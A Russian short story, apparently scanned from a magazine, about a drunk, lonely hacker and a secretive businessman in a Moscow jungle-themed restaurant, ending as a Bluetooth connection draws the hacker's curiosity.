Малышев, не глядя, швырнул в урну жестяной блин, уже третий за эти 
два с половиной часа. Он начал пить тогда, когда в голове четко прорисова- 
лась перспектива остаться одному сегодня. Одной банки оказалось мало, 
вторая потянула за собой третью. Он попытался встать, чтобы пойти взять 
еще парочку (И ЧИПСЫ!) но ноги не слушались. Сергей хмыкнул и заметил, 
что парень с девушкой не сводят с него глаз. Он улыбнулся — по-пьяному, 
кривовато, потом взял со скамейки букет, протянул его незнакомке и сказал: 
— Будьте счастливы... Искренне... Искренне завидую... 

Потом тихонько похлопал парня по плечу и все-таки поднялся. Ноутбук 
качнулся и повис на ремне перед животом, как у коробейника. Сил переместить 
его на бок не было. Малышев посмотрел на себя со стороны, подумал, что 
бог с ним, пусть висит как висит, вот где бы взять еще пива — у киоска рядом 
с его скамьей огромная очередь (весна, спрос на пиво вырос неимоверно!). 


Кинотеатр остался за спиной. Сергей посмотрел на Тверскую и пронося- 
щиеся мимо автомобили, отметил вдоль цепей по краю проспекта стоящих пар- 
ней с цветами — и на него снова обрушилась лавина тоски, которую он сам вы- 
звал необдуманным приемом полутора литров пива. Он вдруг понял — и поверил 
самому себе — что все те парни с гвоздиками, розами и хризантемами, в нагла- 
женных костюмах, с надушенными шеями, обязательно дождутся своих возлюб- 
ленных, своих принцесс, своих королев и фей, подарят им слегка подмерзшие 
букеты, поцелуют и пойдут кто в кино, кто в театр, а кто просто бродить по мо- 
сковским бульварам и проспектам, держась за руки и глядя друг другу в глаза. 

И от этого ему стало так тоскливо, так пусто и одиноко, что, как и вся- 
кому русскому человеку в такие моменты, ему захотелось выпить еще и на- 
чать делать гадости. 

Он оглянулся, посмотрел на девушку, что держала сейчас в руках букет 
гвоздик, предназначенных для Кати, подмигнул ей и направился к тому самому 
киоску, где была большая очередь. 

Он никуда не торопился... 
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Он зашел сюда случайно: совершенно не собирался обедать в ресторане, а 
надеялся заскочить на полчаса к маме. Но его зацепило название — красивое, 
звучное. Остановился рядом со входом, благо днем парковка была не так заста- 
влена машинами, как это бывает в вечерней Москве. Вышел, еще раз прочитал 
название. Потом посмотрел на вход. На стеклянной двери висело какое-то объя- 
вление о входных билетах, но его это не зацепило и не заинтересовало. Он про- 
верил, закрыл ли машину, потом одернул пиджак и, толкнув дверь от себя, вошел. 

Лестница делала два поворота налево. На одном из них он посмотрел 
по сторонам и увидел большой стеклянный террариум с дремлющим пито- 
ном. Остановился, провел пальцем по стеклу... Почувствовал на себе внима- 
тельный взгляд охранника, который оставался наверху и выглядывал из-за 
угла. Усмехнулся, скосил глаза на свое отражение в зеркале напротив, потом 
достал мобильный телефон и проверил, берет ли здесь антенна, ибо зал ре- 
сторана находился под землей на приличной глубине. 

Приема не было. 

Легкая усмешка снова скользнула по лицу. Хорошо, что так: звонки уже 
настолько достали, что скрыться куда-то хоть на пару часов было бы за сча- 
стье. Он продолжил спускаться и вышел в большой просторный зал, в кото- 
ром царил полумрак и играла тихая музыка. Администратор вежливо указала 
ему дверь в гардероб, у него приняли легкую куртку, которую он нес переки- 
нув через руку, предложили взять «дипломат», но он так же вежливо отказал- 
ся, в шутку нахмурив брови и покачав головой. 

Зал ему сразу понравился, он даже решил бывать здесь почаще незави- 
симо от кухни и качества напитков. Стены и потолок — умеренного серого 
цвета — были оплетены массой лиан, периметр помещения был уставлен вы- 
сохшими стволами деревьев. В углах и псевдокабинках со столами стояли боль- 
шие кадки с живыми пальмами и разными растениями, которым трудно было 
придумать не только название, но и описание — настолько причудливы они 
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были. Где-то в дальнем углу зала сквозь звуки музыки был слышен крик попугая. 

Центр зала постепенно приподнимался над всем остальным простран- 
ством и отгораживался от него цепями. Кое-где были видны мостики, по кото- 
рым можно было пройти к бару и сцене (сцена была сейчас во мраке, но 
взгляд выхватывал стойки для аппаратуры, несколько погашенных прожекто- 
ров и большой задник с рекламой). 

На выбор предложили четыре столика — народу в этот час было немно- 
го, можно было выбрать любое место. Больше всего ему понравилось в од- 
ном из дальних углов. Он прошел туда, по дороге взяв с ближайшего столи- 
ка карту вин. «Дипломат» опустился на кресло рядом. Официант подошел, 
поздоровался, предложил меню. 

Выбор был не то чтобы богатый, но достаточный. Он выбрал блинчики 
с семгой, взял кружку «Кромбахера», подумал еще минуту и попросил сразу 
две. Почему-то сегодня, как никогда, хотелось пива. 


ЕГО РУКА ЛЕЖАЛА НА ТАЛИИ 
ПОДРУГИ И ЯВНО 
СОБИРАЛАСЬ НЫРНУТЬ 

ПОД КУРТКУ... 


Работа была уже, по сути дела, выполнена. Никто нигде не ждал его, от 
милиции он всегда откупился бы независимо от степени опьянения. Да он и 
не собирался особенно надираться — повода не было. Просто хотелось по- 
сидеть, поразмышлять о жизни, выстроить планы на ближайшее время... 
И делать все это под регги и крики попугая. 

Пузырьки, поднимавшиеся в кружке «Кромбахера», заставляли медити- 
ровать. Он вынул из кармана маленький цифровик — обожал эту плоскую 
«Минолту», которая поместилась бы даже в пачке от сигарет — навел на 
кружку, попытался выбрать такой вид, чтобы получилась неплохая заставка 
на рабочий стол офисного терминала. Пара щелчков. Просмотрел — понра- 
вилось. Он вдруг понял, что хочет фотографировать все вокруг — настолько 
необычным показался ему этот клуб. Или ресторан? Сложно сказать, в чем 
разница, особенно если не понимаешь ее. 

Он сделал несколько снимков зала. Больше всего ему понравился бар, 
даже не столько сам бар, сколько очень привлекательная барменша с высо- 
кой грудью. Где-то после пятого или шестого снимка она поняла, что к ней 
проявляют интерес, повернулась сначала боком, а потом вовсе стала спиной, 
пересчитывая деньги в кассе. Снимки спины не были бы красивыми или ин- 
тересными. Пришлось переключиться на что-нибудь другое. 

В противоположном углу зала телевизор, подвешенный в углу между 
стеной и потолком, показывал футбол. Отсюда было видно плохо. Чтобы хоть 
как-то понять, кто же играет, он навел фотоаппарат на телевизор и включил 
зуммер. На экране проступили названия команд и счет. Ни то, ни другое не 
казалось интересным. 

И он принялся за блинчики, благо их уже принесли. 

Вилка тихонько постукивала по тарелке. Пиво постепенно убывало. В 
отличие от пива, люди все прибывали. Вокруг него заполнились три столика. 
Пока никто не набивался к нему в соседи, мест хватало, но скоро могла на- 
грянуть и целая толпа. В принципе, он был не против, но не любил случайных 
знакомств в ресторанах. Если вдруг сосед не понравится, он встанет и уйдет. 

Барменша периодически бросала взгляды в его сторону. Чувствова- 
лось, что первое неприятие фотографий прошло и теперь ее раздражает от- 
сутствие интереса. Он понял это, дождался, когда встретится с ней глазами, 
улыбнулся. Она улыбнулась в ответ. Он поднял кружку пива, делая вид, что 
пьет за нее. Она смутилась и отвернулась. 

За столик рядом принесли кальян. Соседи попались довольно шумные, 
и хотя нельзя было разобрать ни слова из их разговора, они создавали до- 
вольно громкий фон. Кальян добавил суеты, они стали спорить, кто из них бу- 
дет первым. Одна дама попыталась рассказать всем о том, как она впервые 
попробовала этот ароматный дым, но ей быстро прикрыли рот очередным то- 
стом за какую-то именинницу, после чего облако дыма медленно стало под- 
ниматься к потолку, покрытому сетью лиан. 

Внезапно среди этого зала, становящегося шумным, он почувствовал 
себя одиноким, причем чувство было очень сильным, пронзительным, словно 
крик боли. Вдруг захотелось увидеть рядом с собой своих школьных друзей, 
институтскую любовь и просто хоть кого-нибудь из знакомых, чтобы поднять 
кружку пива вместе, вспомнить прошлое, посмеяться, посплетничать — в об- 
щем, радоваться жизни, а не просто разглядывать с расстояния в двадцать 
метров барменшу модельной внешности, вздыхая по поводу ее фантастиче- 
ской груди и представляя, как бы он к ней прикоснулся... 

Он достал «Палм», перекачал туда фотографии с «Минолты», отметил 


про себя, что аккумуляторы на фотоаппарате садятся (давно не заряжал их, а 
еще дольше не пользовался цифровиком, как-то не находился повод. Девушка 
за стойкой настолько завела его, что он вдруг вспомнил, что такое женщины, эро- 
тика, весна, любовь...). Потом решил переслать изображения на домашний ком- 
пьютер, чтобы потом рассмотреть их во всех подробностях, но понял, что не судь- 
ба: антенна телефона в зале не брала, поэтому выйти в интернет не представ- 
лялось возможным. Он разочарованно покачал головой, потом украдкой посмо- 
трел в сторону бара и понял, что его щелчки и всплески фотовспышки не остави- 
ли девушку равнодушной. Она явно ждала его взгляда, чтобы улыбнуться снова. 

Спустя секунду она вдруг зачем-то показала ему свой сотовый телефон. 
Подняла на уровень головы, покачала из стороны в сторону, еще раз улыб- 
нулась. Он не понял. Она пожала плечами и положила телефон на стойку, ря- 
дом с большими пивными кранами с эмблемой «Кронбахера». 

«Что это значит? Она хочет познакомиться и обменяться номерами те- 
лефонов?» В пользу этой версии была масса сомнений: он никогда не причи- 
слял себя к людям, которые производят неизгладимое впечатление на деву- 
шек в течение первых пятнадцати минут, заставляя их сходить с ума и броса- 
ться в объятия. У него всегда были проблемы с женским полом, еще с самой 
школы, да и в институте он не пользовался особенной популярностью. Ли- 
шился девственности, смешно сказать, в двадцать лет, когда многие из его 
друзей уже имели семьи и кучу детей. И вот внезапно красавица родом из 
«Пентхауза» показывает ему свой сотовый и предлагает познакомиться. 

Здесь явно что-то было не так. 

Но он, перекрестившись в душе, встал и подошел к стойке бара. 
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Пришлось стоять долго. Сложилось такое впечатление, что пиво есть только 
здесь, на Тверской. В очереди слышались шутки на тему весны, проходящих 
мимо девушек и качества продаваемого продукта. Сергей, переминаясь с но- 
ги на ногу, выискивал среди проходящих знакомые лица, но, как это и быва- 
ет в больших городах, случайная встреча должна быть запрограммирована 
заранее. Ни одной знакомой физиономии. 

Продавщица сунула ему две «Сибирских короны» в маленькое окошко, 
в которое вряд ли пролезло бы что-то больше, чем банка пива. Отойдя в сто- 
рону, OH сдернул с одной из них жестяной язычок и жадно отхлебнул — слов- 
но в жару. Пиво обожгло, ударило в нос. 

Сергей машинально оглянулся, отметил про себя, что милиции рядом 
нет (ох уж этот закон о распитии спиртных напитков!), поискал глазами сво- 
бодную скамейку, но присесть ему не удалось. Люди, словно воробьи, обле- 
пили в этот погожий день и лавочки, и фонтаны, и даже бортики подземного 
перехода, уносящего людей к метро. 

— Эх, Катя, — только и смел сказать он себе. — Ладно-ладно... 

И вышел на Страстной бульвар. 

Движение было спокойным, он не торопясь перешел улицу, даже не об- 
ратив внимания на светофоры. Сумка с компьютером била его по животу, но 
он не замечал — временами останавливался, запрокидывал голову и делал 
большой глоток. Метров через сто во время очередного возлияния он поднял 
глаза к небу и прочитал: 

— «Амазония»... 

Название удивило. Он пробегал здесь время от времени, как все москви- 
чи, смотря строго в асфальт. Только гости столицы ходят задрав голову кверху 
и читая мемориальные таблички и изучая невиданную архитектуру — сталин- 
скую ли, хрущевскую или еще какую-нибудь, например родом из средневеко- 
вья. Вот почему светящаяся реклама приятно удивила его: он никогда не был вну- 
три этого заведения. Желание побывать там усилилось, когда он прочитал объ- 
явление возле входа: «Для клиентов ресторана — бесплатный доступ в интернет». 

В общем, плюсов было больше, чем минусов. Он хотел согреться — 
раз. Два — жутко хотелось в туалет (попробуй реши эту проблему в много- 
миллионном городе, где всегда рядом с тобой кто-то ходит и не дает снять 
штаны). Проснулось чувство гол ода — три, а деньги при этом в кармане бы- 
ли — это четыре. Ну и интернет — не поймешь, то Ли «Пять», то ЛИ «раз». По- 
жалуй, именно халявная Сеть оказалась как первой, так и последней каплей, 
которая заставила его принять решение. 

Он допил пиво из первой банки, вторую решил приберечь до лучших вре- 
мен, но потом понял, что лучшие времена, пожалуй, уже настали: чем больше 
выпьешь на улице, тем меньше заплатишь внутри. Громкий щелчок открывашки 
заставил охранника, вышедшего на улицу с сигаретой, вздрогнуть и вниматель- 
но посмотреть на молодого человека, который, похоже, собирался зайти внутрь. 

Малышев одним духом опустошил банку и едва не задохнулся, к по- 
следним глоткам воздуху уже явно не хватало. Из-за раздавшейся громкой 
отрыжки лицо охранника перекосило («Господи, что за чудо?!»), но он ото- 
шел в сторону, выпуская дым куда-то вбок и пропуская Малышева внутрь. 

Когда Сергей спускался вниз по ступенькам, его уже ощутимо покачи- 
вало. Раздражение от неудавшегося свидания давно ушло и сменилось ка- 
ким-то необъяснимым благостным ощущением. Он шел, считая шаги, при- 


крыв глаза и придерживаясь рукой за стену. Во время одного из покачиваний 
рука провалилась куда-то в пустоту и пальцы нащупали какие-то бумаги. Он 
ухватился за них, вытащил несколько — рекламные проспекты ресторана, 
выставленные в решетчатую стойку. Сергей посмотрел на них непонимаю- 
щим взглядом, но из рук не выпустил и продолжил движение в зал. 

Администратор подошел к нему и тут же понял, что перед ним изрядно 
выпивший человек. Выражение его лица сразу стало обеспокоенным, за спи- 
ной он легонько махнул рукой охраннику в зале. 

Малышев заметил движение в направлении своего столика, усмехнул- 
ся и сказал: 

— Не бойтесь, я не буйный... Кушать хочется. Посадите меня куда-нибудь, где 
есть интернет. В уголочек... 

Администратор скосил глаза на охранника, тот еще раз с головы до ног 
осмотрел гостя. 

— Фейс-контроль? — снова усмехнулся Сергей. — Надо же, всегда прохо- 
дил. Неужели покушать не дадите? 

— Ну смотри, — неласково кивнул охранник. — У нас разговор короткий. 

— Охотно верю, — Малышев потянул с себя куртку, подошел к гардеробу. — 
Номерочек, пожалуйста. Если можно, нечетный. Я в приметы верю. 

— Это какая же примета на номерки есть? — поинтересовалась девушка за 
гардеробной стойкой. 

— А? — переспросил Малышев, который в это время разглядывал зал и си- 
дящих за столами людей. — Да бог ее знает... А что, нечетных нет? 

— Почему нет? Есть. Вот, тринадцатый. Как насчет суеверий? — она протяну- 
ла ему желтый ромбик из пластика. 

Сергей взял его в руку, подмигнул гардеробщице, потом спросил: 

— А вас случайно не Катя зовут? 
— Что, тоже примета? Нет, я Марина. Но с незнакомыми парнями, тем более 
на работе, не общаюсь. 

Малышев покачал головой. 

— Серьезное заявление... Вообще меня Сергей зовут, но если вы такая прин- 
ципиальная, Марина, лучше не надо продолжений. Пойду я пивка врежу... 

— Да уж... Врежь, — проворчала ему в спину Марина, которая за полтора го- 
да работы в «Амазонии» уже устала от подобных разговоров. Малышев тем 
временем вернулся к администратору. 

— Я прочитал объявление... — махнул он рукой в сторону входа. — А ноутбук 
ношу с собой так, как бизнесмен кредитные карточки — всегда. Хочется ве- 
рить в удачу — что за столами для интернета еще есть свободные места. 

Он попытался улыбнуться, но понял, что уже перегибает палку — в кон- 
це концов, какое дело администратору до его пристрастий. Лишь бы деньги 
по счету заплатил и не хулиганил. Тем временем ему указали в правый даль- 
ний угол зала — там был пустой стол на четыре места. 

— Вы можете подключаться при условии заказа, — объяснил администратор. 
— Сначала меню, потом интернет. Все очень просто. 

— Утром деньги — вечером стулья, — кивнул Сергей. — Давайте сразу офи- 
цианта, закажу пива и какой-нибудь закуски. 

— Как угодно. 

Малышев прошел к себе за столик, рухнул в кресло, придерживая ру- 
кой сумку с компьютером, и только после этого обратил внимание на дизайн 
ресторана. Обилие зелени и полумрак джунглей очень и очень удивили его. 
Он покачал головой, достал ноутбук, включил его. 

Легкий голубоватый свет отразился на лице Малышева. Он взглянул на 
экран, потом огляделся, не увидел официанта и протянул руку к маленькой 
полусфере в центре стола, которая была кнопкой для вызова обслуживаю- 
щего персонала. Девушка появилась спустя минуту. 

Сергей пробежал глазами меню, выделил для себя раздел «Пиво», тща- 
тельно исследовал его и ткнул пальцами в «Холстен», потом выбрал кое-что 
из морепродуктов, особо не вчитываясь в названия. 

— Если можно, побыстрее. А то меня в Сеть не пустят без вашей растороп- 
ности. 

— Сию минуту, не беспокойтесь, — девушка улыбнулась ему во все тридцать 
два зуба. — Просто сегодня много народа, хотя это обычная картина по пят- 
ницам и субботам. 

Сергей улыбнулся в ответ и посмотрел ей в спину. Фигура у нее была очень 
даже ничего. Прямая спина, тонкая талия, на бедрах короткая юбка, облегающая 
каждый сантиметр, прямые, без излишней полноты, ноги. Больше всего Малыше- 
ву понравились ее колготки — черные, сеточкой. Сетка была не мелкой и не круп- 
ной — не вульгарной и не пионерской. Сергей смотрел ей вслед и не мог оторвать 
взгляд от шва на колготках, который выбегал из-под юбки и скрывался в туфлях 
на высоком каблуке. «Цок-цок! Цок-цок!» — стучали ее набойки, и хотя она удаля- 
лась все дальше и дальше, даже звуки музыки не могли заглушить их. Где-то вну- 
три колыхнулись мысли о несбывшемся свидании с Катей, потом он вдруг решил 
познакомиться с официанткой поближе, но пиво, выпитое на улице, ударило ему 
в голову уже не молоточком, а кувалдой: он представил, как она вечером ждет то- 
го, кто должен приехать за ней, как она садится в машину и уезжает, а он смотрит 


ей вслед, и вот очередное разочарование в его жизни, еще одна пощечина, еще 
одна неудача... В последнее время что-то много таких неудач. Хватит, довольно. 

Все-таки он проследил за официанткой до тех пор, пока она не скры- 
лась в двери с надписью «Только персонал!». Когда она исчезла из поля зре- 
ния, Малышев стряхнул пелену с глаз и обратил внимание на бар, освещен- 
ный нежным светом. Большой полукруг с двумя большими пивными кранами 
и пущенными по самому верху направляющими для бокалов. Стекло сверка- 
ло, будучи отмытым до блеска, на кранах с трудом читались какие-то слова, 
обвивающие их по спирали. За стойкой шла своя жизнь. 

Возле стойки стоял молодой человек, прислонившись к ней грудью и 
глядя в глаза девушке, стоящей по ту сторону. Барменша, как и официантка, 
была высокая, стройная. Кого попало сюда явно не брали, о персонале забо- 
тились. Парень и девушка вели какой-то разговор. Похоже, OH них не очень 
клеится, но не потому что они рассержены друг другом — скорее, они нала- 
живают контакты, знакомятся. Перед ними на стойке лежали цифровой фо- 
тоаппарат и мобильный телефон. Девушка что-то объяснила парню, помахав 
руками над головой, после чего засмеялась. 

— У нее, наверное, на ногах тоже колготки в сеточку, — произнес вслух Ма- 
лышев. — Они здесь все словно близнецы. 

И точно. Она отошла немного в сторону, когда ее отозвал официант, и 
Сергей со своего возвышения сумел разглядеть точно такую же сеточку — 
черную, среднего размера, со швом. 

Спустя несколько секунд девушка вернулась. Молодой человек тем време- 
нем наблюдал за ней и, похоже, украдкой сфотографировал, отключив вспыш- 
ку, чтобы не привлечь внимания, благо внутри бара было достаточно светло. 

— Папарацци... — Малышев нахмурил брови. — Везет же... Я бы вот так за- 
просто к девушке не подошел. Хотя кто знает... 

В это время вернулась с подносом девушка, принимавшая заказ. На 

стол аккуратно было выставлено пиво, тарелки с закуской. На салфетку ря- 
дом легли приборы. Малышев кивнул, благодаря, и снова увидел ее колготки. 
— У вас красивые ноги, — машинально произнес он и похолодел — сейчас 
девушка должна была влепить ему пощечину. Ну, или, в крайнем случае, со- 
общить о приставаниях охраннику. И накрылся его интернет медным тазом... 
— Спасибо, — девушка улыбнулась и будто бы невзначай повернулась к не- 
му так, чтобы он мог прочитать на бейджике ее имя. — Что-нибудь еще? 
— Ну, не только ноги. Еще грудь, — машинально ответил Малышев и только по- 
том понял, что она имела в виду совсем другое: не принести ли ему еще что-то, 
чего он не заказал сразу. — Ой, простите, пожалуйста, я сразу не понял... Я че- 
го-то набрался сегодня... Как-то не заладилось вот с утра, а потом... Да чего гово- 
рить! А с вами можно познакомиться поближе? — вдруг спросил он. — Ну, как вон 
тот парень у стойки. Подошел и говорит. Похоже, номерами сейчас обменяются. 
— Стойка бара — это другое дело, — тихо сказала девушка. — Я же не могу 
присесть к вам за стол. Но моя смена скоро закончится, придут вечерние дев- 
чонки, и тогда, пожалуй, я могла бы... 

Она многообещающе улыбнулась и ушла. А Сергей понял, что ему надо 
продержаться некоторое время, борясь с неизбежным алкогольным опьяне- 
нием. Он подключился к интернету, побежал глазами несколько новостных 
сайтов, не нашел ничего интересного и собрался было проверить почту, но 
вдруг увидел на барной стойке рядом с молодым человеком наладонник. 

А вот это было уже очень и очень интересно... 
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OH подошел, улыбнулся, Kak бы показывая одновременно свою вежливость и 
непонимание ситуации, как будто он не понял, что от него хотят, и просит 
объяснений. 


ГДЕ-ТО В ДАЛЬНЕМ УГЛУ ЗАЛА 
СКВОЗЬ ЗВУКИ МУЗЫКИ БЫЛ 
СЛЫШЕН КРИК ПОПУГАЯ 


— Татьяна, — представилась первым делом девушка. — Вам у нас нравится? 
— Вотесли бы вы спросили, что именно нравится, я бы с удовольствием назвал 
вас, — тут же нашелся он и представился в ответ. — Максим. Очень приятно. 
— Мне тоже... Секундочку, — она отошла в сторону, что-то набрала на ком- 
пьютере и быстро вернулась. — Работы много... Не успеваю. Напарник от пи- 
ва отойти не может, все как с цепи сорвались, а вся остальная работа на мне. 
Вот скоро сменщица появится и можно будет вздохнуть свободнее. 

Максим слушал ее и оставался в недоумении: зачем его позвали, прив- 
лекая внимание сотовым телефоном. Девушка, похоже, уже и забыла об 
этом, продолжая щебетать о трудностях ремесла бармена, и он был вынуж- 
ден легонько, будто бы случайно стукнуть телефоном по стойке бара. Она по- 
смотрела на него, а потом спохватилась: 


x 
> 
|= 
о 
Pa 
8 
9 
о 
о 


— Поняла, поняла, Максим. Прошу прощения. Дело в том, что я увидела у вас 
на столе телефон. Казалось бы, что в этом такого? Здесь у всех телефоны... 
— Действительно, — Максим улыбнулся и понял, что неотрывно смотрит на 
ее грудь, точнее на то, что она позволяла видеть окружающим, расстегнув 
верхнюю пуговицу блузки. 

— Но у Bac был какой-то расстроенный вид, — покачала Татьяна головой. — 
Я права? 

«Честно говоря, не думаю, — признался сам себе Максим. — Хотя 

вдруг я так выгляжу со стороны? Этаким замученным, усталым бизнесменом, 
который уже слабо представляет себе, как сможет добраться до постели, и 
готов упасть там, где стоит?» 
— Да, вы, безусловно, наблюдательны, — кивнул он, понимая, что для удач- 
ного знакомства надо обязательно подыграть. — Устал, знаете ли. Работа, 
куча дел, бездарные сотрудники, валюта скачет, нефть то дорожает, то... Да 
бог с ними, с делами, чего я о них! Татьяна, вы позвали меня, показав теле- 
фон, и я решил, что вы хотите со мной познакомиться поближе, хотя, если 
честно, это был бы уж очень смелый жест с вашей стороны, согласитесь... 

Девушка смутилась и спросила: 

— Вы действительно истолковали мой жест именно так? 

— Ну... А как? Или я тут же в ваших глазах стал неким испорченным типом, 
который без зазрения совести знакомится в барах с девушками, чтобы по- 
матросить и бросить? 

— Администратор смотрит, — внезапно сказала она и отвернулась. Максим 
повертел головой, никакого администратора поблизости не нашел и понял, 
что она просто смутилась и не смогла найти повода пореалистичнее. Не най- 
дя ничего лучше, он сфотографировал ее, благоразумно отключив вспышку, 
и порадовался своей удаче. 

Спустя некоторое время она прекратила протирать бокалы стоя спи- 
ной к нему, повернулась и сказала: 

— У нас тут ресторан на двадцать метров под землей — глубоко для сотовой 
связи, понимаете? 

— Уже заметил. Телефон не берет, — согласно кивнул Максим. Только за- 
шел и сразу понял все прелести этого места. Если хочешь скрыться от всех 
и вся и быть абсолютно по-честному недоступным, спустись под землю. А тут 
лианы, попугаи, дым кальяна... И тишина... 

«И только мертвые с косами стоят», — так и просилось на язык, но он 
побоялся обидеть ее и промолчал. 
— Да уж, зона недоступности, — кивнула Татьяна. — Порой просто ужас, 
клиенты ругаются, особенно зимой, когда не хочется на улицу выходить, 
если звонок срочный. Но у нас тут есть маленький секрет... 
— Неужели? — удивился Максим, пока еще не понимая, о чем это она. 
— Тугесть такое место, где телефоны ловят сеть, — кивнула Татьяна, обра- 
дованная фактом того, что сумела произвести впечатление на молодого че- 
ловека своей осведомленностью. — Фантастика какая-то, но это истинная 
правда. Никто толком понять не может: двадцать метров под землей, куча ка- 
ких-то перекрытий (здесь раньше было бомбоубежище) и все равно... Вот 
если сесть во-он за тот столик, видите — там еще парень сидит с ноутбуком... 
— К нему присоседиться? 
— Нет, не за его столик, а рядом, там, где стоит пальма и клетка с попугаем... — 
она махнула рукой в ту сторону. — Так вот прямо под клеткой и нигде больше, 
на телефонах появляется устойчивый прием. Мы об этом кому попало не сооб- 
щаем, а то начнут бегать туда звонить без конца, птицу бедную с ума сведут... 
— Ая, значит, не кто попало, — понимающе подмигнул Максим. 
— A вы мне сразу понравились, — честно сказала Татьяна, и Максим понял: 
она не врет. — Вот только обидно будет, если я вам это рассказала, а вы 
сейчас пойдете и позвоните своей девушке... 
— У меня нет девушки, — покачал головой Максим. — А вот телефон, если 
отсюда действительно можно позвонить, пригодится. Ноутбука, как у того 
парня, у меня нет, а в интернет я бы сейчас вышел. Есть кое-какая работа. 
А вы скоро освободитесь? 
— Через сорок минут, — даже не глядя на часы, ответила Татьяна. — Или 
около того. 
— Как освободитесь, подходите ко мне за столик, — пригласил Максим. — 
А я пока кое-что улажу... Под попугаем. Придете? 

Она кивнула. 
— Ну тогда увидимся через сорок минут. 

Он подмигнул ей и с неохотой отошел от стойки бара. Татьяна все 
больше и больше притягивала его. 

Вернувшись за свой столик, он взглянул на попугая в клетке: большой 
хохлатый какаду спокойно покачивался на жердочке, не издавая ни звука. 
Максим прищурил глаза, выстраивая в голове некий план работы, потом 
взял телефон и компьютер и направился к столику, за которым, если верить 
Татьяне, была доступна сотовая связь. 

Когда он проходил мимо столика, за которым сидел изрядно набрав- 
шийся парень с ноутбуком, он почувствовал на себе его неприязненный 


взгляд, но не решился встретиться с ним глазами. Не из трусости. Просто по- 
сле разговора с красивой женщиной, взволновавшей его по полной про- 
грамме, не хотелось видеть что-то пьяное и противное. Он опустился в кре- 
сло, положил все свои девайсы на столик, проверил телефон. 

Антенна появилась спустя примерно минуту, когда он уже стал сомне- 
ваться в правдивости слов Татьяны. Он кивнул вроде бы телефону, а на са- 
мом деле Татьяне, которую отсюда было видно достаточно плохо. 

— И правда, чудеса какие-то, — согласился он, представив себе, насколько 
глубоко он сейчас находится. — Не будем терять время. У меня есть сорок 
минут... Ну, или пока батарейка не сядет. 

Он подключился к интернету, «голубой зуб» связал его наладонник со 
всем миром. Взяв в руки стило, Максим принялся за свои обычные дела. 

Его друзей всегда поражала та степень концентрации, с которой он 
уходил в работу. Весь мир вокруг переставал существовать для него: имели 
смысл только работа и ее результат. И еще неизвестно, что важнее. Гонора- 
ры наталкивали на мысль, что важен именно результат, но если судить по по- 
лучению кайфа, на первом плане был сам процесс. Вот и сегодня он, едва 
почувствовав, как от него к миру потянулась невидимая ниточка, сосредото- 
чился на информации, поступавшей от его агентов. Он классифицировал 
данные, раскладывал их по полочкам и делал выводы. Выводы, на основании 
которых он должен был сделать свою работу. 

Но сквозь эти выводы, сквозь байты информации, перед ним постоянно 
всплывало лицо девушки, захватившей его сердце. Лицо Татьяны. Оно неуло- 
вимо проскакивало между страницами интернета, проникало в его сознание 
откуда-то с самых границ зрения — и заставляло сердце биться сильнее. 

А когда сердце бьется сильнее, очень редко смотришь по сторонам... 


ххххх 


Малышев отхлебнул пива, поставил кружку на картонку с эмблемой «Хол- 
стен» и откинулся в кресле. Парень у барной стойки по каким-то причинам 
привлекал его внимание. Казалось, от него можно ожидать всего. Слишком 
благополучно он выглядел, даже чересчур. 

Этакий мажор, умеющий налаживать отношения с девушками в тече- 

ние нескольких секунд. (Сам Сергей уже успел позабыть, как он ринулся 
знакомиться с первой попавшейся ему официанткой и она, между прочим, 
согласилась прийти к нему за столик по окончании смены.) Деловой костюм, 
дорогой телефон, серьезный наладонник. Достаточно богатая заколка для 
галстука. Сверкающие туфли. На том столике, откуда он прошел к бару, — 
«Кромбахер», по сто восемьдесят рублей кружка, тарелка с блинчиками с 
семгой (Малышев заглянул в меню, проверил цены — дороговато). Наверня- 
ка у входа машина, а он пьет пиво, значит, не боится быть пойманным в не- 
трезвом виде за рулем. А может быть, у него есть водитель, который приедет 
за ним по первому же звонку. 
— Даяи сам... — буркнул Малышев, но осекся. Сам он был далек от того ми- 
ра, в котором вращался этот мажор. Из дорогих вещей у него был только 
ноутбук, на который он копил три с половиной года, подрабатывая в магази- 
не по продаже оргтехники. Копил, во многом отказывая себе и не успевая 
порой за ценами и прогрессом. Едва появлялась более или менее приличная 
сумма, как тут же выходило что-то новое, современное, быстрее и умнее, на- 
дежнее и красивее. И приходилось начинать все сначала. 

Безусловно, деньги у него если и не были, то БЫВАЛИ. Он умел делать 
такие вещи, которые в мире стоили очень дорого. Он умел добывать инфор- 
мацию, причем делал это очень и очень непринужденно, играючи, что ли. 
Нельзя было назвать это талантом — просто он чувствовал, как решить про- 
блему. Чувствовал. 

Как раз такое чувство время от времени приносило ему неплохой до- 


ОДНА ДАМА ПОПЫТАЛАСЬ 
РАССКАЗАТЬ ВСЕМ О ТОМ, КАК 
ОНА ВПЕРВЫЕ ПОПРОБОВАЛА 
ЭТОТ АРОМАТНЫЙ ДЫМ... 


ход. Началось все с вполне невинного взлома чужих почтовых ящиков на об- 
щедоступных сервисах типа mail.ru и list.ru, а потом — все дальше и дальше... 
Он добывал информацию из любых доступных точек земного шара. Потом из 
недоступных. Потом земного шара ему стало мало, но, к сожалению, на 
близлежащих небесных телах Сети не было. 

Фанатик. Фанатик интернета. Ваххабит взлома. Человек, придержи- 
вающийся крайних взглядов в отношении Сети, и при всем при том совер- 
шенно спокойный, скромный и сомневающийся в обычной повседневной 
жизни. Его неудача с Катей — живой пример тому. Его мозг не умел строить 


прогнозы насчет отношений с девушками, в отличие от хакерской работы. 

... Молодой человек, ставший объектом его изучения, отошел от бара, 
но не вернулся за свой столик, а почему-то пошел куда-то в сторону Сергея. 
Прямо возле его столика он повернул налево, поднырнул под нависающую 
лиану и присел по другую сторону искусственной стенки, разделявшей их ка- 
бинки. Попугай в клетке скосил на него свой глаз, переступил с ноги на ногу, 
но не издал ни звука. 

Сергей вытянул шею, как жираф, чтобы разглядеть, зачем же этот че- 
ловек сменил свое место, позабыв о пиве и блинчиках. Было плохо видно, по- 
лумрак скрадывал все. Парень положил на стол наладонник и принялся кол- 
довать над ним. 

— Телефон... — пробурчал Сергей. — Телефон здесь не берет. Дурачок... 

И в это время на его ноутбуке запищал опознаватель «голубого зуба». 
Где-то рядом заработал Bluetooth. Сергей взглянул на экран, по низу которо- 
го было написано «Найдено два устройства. Произвести синхронизацию?» 
— Чушь какая-то, — покачал он головой и протянул руку к кружке с пивом. — 
Нахрена здесь все это? Телефон же... А вдруг?.. 

Он сделал вид, что решил посмотреть попугая поближе. Нетвердые но- 
ги понесли его к тому столику, где сидел парень. 

